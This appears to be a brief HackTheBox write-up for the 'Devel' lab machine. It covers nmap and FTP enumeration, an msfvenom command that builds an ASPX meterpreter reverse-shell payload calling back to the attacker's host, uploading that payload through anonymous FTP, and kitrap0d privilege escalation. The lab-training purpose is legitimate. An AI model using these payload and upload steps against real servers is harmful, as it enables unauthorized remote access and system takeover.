# Devel HTB

## Enumeration

* we use nmap to enumerate `nmap -p- -A -T4 10.10.10.5`![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-ff2b6e0d7464700d2b01145488d68085db8e6cbc%2Fb7cf63eb8c6ea51d86bad5ccb3c8dc1f.png?alt=media)
* We found anonymous access in ftp
* We found a website hosted on the IP (poor hygiene) ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-36a724ea95f3c888078a9ecce57b7268fa0679db%2Ff778a60dd8010e74464e3e2141b07f8d.png?alt=media)
* using *dirbuster* to bust the directories:![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-72fe8b1daf35b6422086894392959f75b52c8b99%2F0715e3cd286726b8c2def1a6f181be9c.png?alt=media) We found nothing : (

#### FTP

We can anonymously login into ftp and upload files:\*\*![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-2909be2b10ed873885a705655b2e7973dda7e6a9%2F67d502c19c3c0856ceb60eca4d6888b3.png?alt=media) We can exploit this and use to our advantage

## Exploitation

* We can use this cheatsheat: <https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/msfvenom> and use the ASP/x payload.
* To output the ex.aspx file with the payload: `msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.9 LPORT=4444 -f aspx > ex.aspx`
* we use `msfconsole` to listen on port 4444
* upload to ftp by binary preferably. ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-a9fe23936b6f3493a2479a73dcd0b9fe8aaaf592%2F40025786967ebd9c87b2dcf1c8eda781.png?alt=media)
* WE GET A METERPRETER SHELL!!!! -![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-cfd80633f4a3711ffa72bac9002bff49bb7ab0b8%2Fe309c275f762cf167d314aa32e6ac6a9.png?alt=media)
* we can als0 use `msfvenom -p windows/powershell/powershell_reverse_tcp LHOST=10.10.16.9` to gain access without metasploit.
* We can use post exploit called suggester: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-ef2a1051c5757b3a0046b01aa08de48b239a7165%2Fd5d0fc85ef20a7e45f6cd086614fdcce.png?alt=media)
* Post exploitation using kitrap0d for privilege escalation we got admin access![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-566159ad4a9b916a0adef933cf35ad58b29c7aff%2F132af84569da1d754fd6b02a49fc1b5c.png?alt=media)